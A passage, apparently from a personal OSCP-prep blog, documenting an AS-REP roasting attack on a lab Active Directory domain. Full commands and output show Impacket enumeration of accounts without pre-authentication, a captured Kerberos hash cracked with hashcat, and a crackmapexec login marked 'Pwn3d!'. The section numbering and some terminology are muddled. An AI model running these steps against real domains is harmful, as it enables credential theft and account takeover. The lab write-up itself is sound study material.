This attack is directly execute to Domain Controller too. In order to perform the attack, the attacker look for a users with not_pre authenticate property enabled for get a TGS kerberos Ticket.

2.1 AS-REP-Roasting detection:

The ASREPRoasting attack is performed directly to an existing account that is vulnerable to this kind of attacks, because it has enabled the NOT_PRE_AUTH attribute on domain account.

2.2 PREREQUISITE:

Configure a vulnerable user to ASREPRoasting attack from on your domain controller:

- Create new user for this kind of attack:

1.3 Kerberoasting exploitation:

- Looking for a vulnerable users: 

kali@kali:~$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py  CORPORATIVE.DOMAIN.local/worker2:Passw0rd1

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Name     MemberOf                                                                                       PasswordLastSet             LastLogon  UAC      

-------  ---------------------------------------------------------------------------------------------  --------------------------  ---------  --------

NP_user  CN=Propietarios del creador de directivas de grupo,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local  2021-09-19 15:13:32.016064  <never>    0x410200 

- Obtaining a kerberos preauth TGS ticket:

$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$c23bb63eba739938bfe4ace881811db58b8982832b14361552efd301f79667714a2d6552eebc8567874e82c2fa16acf7048ec8ea513d2f2dfc6163f19f1d477ea75451b35170b8b6864aa29ba3487d5d4e56b70724b4302dda1bea37615415566d67a4830ab0bde920f41b3d024c607aaf78689b5e06ca5adfcd38df2b3d3314aaf4e4362fd8aef21f12a5646006e9347d1a0372b63d70ad59526ed92fbcd04e3369712697bd2ddd951421587bd2c3e858681d4235ddf4f86affa3a53463c87e0de07a50b10737258b0a7b03112cceefe0eca4eb4b80a4c1a87274410eb151df7db5c438bef86a2e1be4902e56829efd86b5341487e67002f9b4861ab490b0f0386caed6

- Performance an offline attack using hashcat :

sudo hashcat -m18200 '$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$c23bb63eba739938bfe4ace881811db58b8982832b14361552efd301f79667714a2d6552eebc8567874e82c2fa16acf7048ec8ea513d2f2dfc6163f19f1d477ea75451b35170b8b6864aa29ba3487d5d4e56b70724b4302dda1bea37615415566d67a4830ab0bde920f41b3d024c607aaf78689b5e06ca5adfcd38df2b3d3314aaf4e4362fd8aef21f12a5646006e9347d1a0372b63d70ad59526ed92fbcd04e3369712697bd2ddd951421587bd2c3e858681d4235ddf4f86affa3a53463c87e0de07a50b10737258b0a7b03112cceefe0eca4eb4b80a4c1a87274410eb151df7db5c438bef86a2e1be4902e56829efd86b5341487e67002f9b4861ab490b0f0386caed6' -a0 /usr/share/wordlists/rockyou.txt 

 The wordlist or mask that you are using is too small.

This means that hashcat cannot use the full parallel power of your device(s).

Unless you supply more work, your cracking speed will drop.

For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.  

$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$c23bb63eba739938bfe4ace881811db58b8982832b14361552efd301f79667714a2d6552eebc8567874e82c2fa16acf7048ec8ea513d2f2dfc6163f19f1d477ea75451b35170b8b6864aa29ba3487d5d4e56b70724b4302dda1bea37615415566d67a4830ab0bde920f41b3d024c607aaf78689b5e06ca5adfcd38df2b3d3314aaf4e4362fd8aef21f12a5646006e9347d1a0372b63d70ad59526ed92fbcd04e3369712697bd2ddd951421587bd2c3e858681d4235ddf4f86affa3a53463c87e0de07a50b10737258b0a7b03112cceefe0eca4eb4b80a4c1a87274410eb151df7db5c438bef86a2e1be4902e56829efd86b5341487e67002f9b4861ab490b0f0386caed6:Passw0rd1

                                                 

Session..........: hashcat

Status...........: Cracked

Hash.Name........: Kerberos 5, etype 23, AS-REP

Hash.Target......: $krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9a...6caed6

-And finally validate login for a new user:

kali@kali:~$ crackmapexec smb 10.0.2.17 -u"NP_user" -p"Passw0rd1"

SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)

SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DOMAIN.local\NP_user:Passw0rd1 (Pwn3d!)

And this is all, for this couple Active directory attacks, I hope that you enjoy with my eigth windows entry and you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.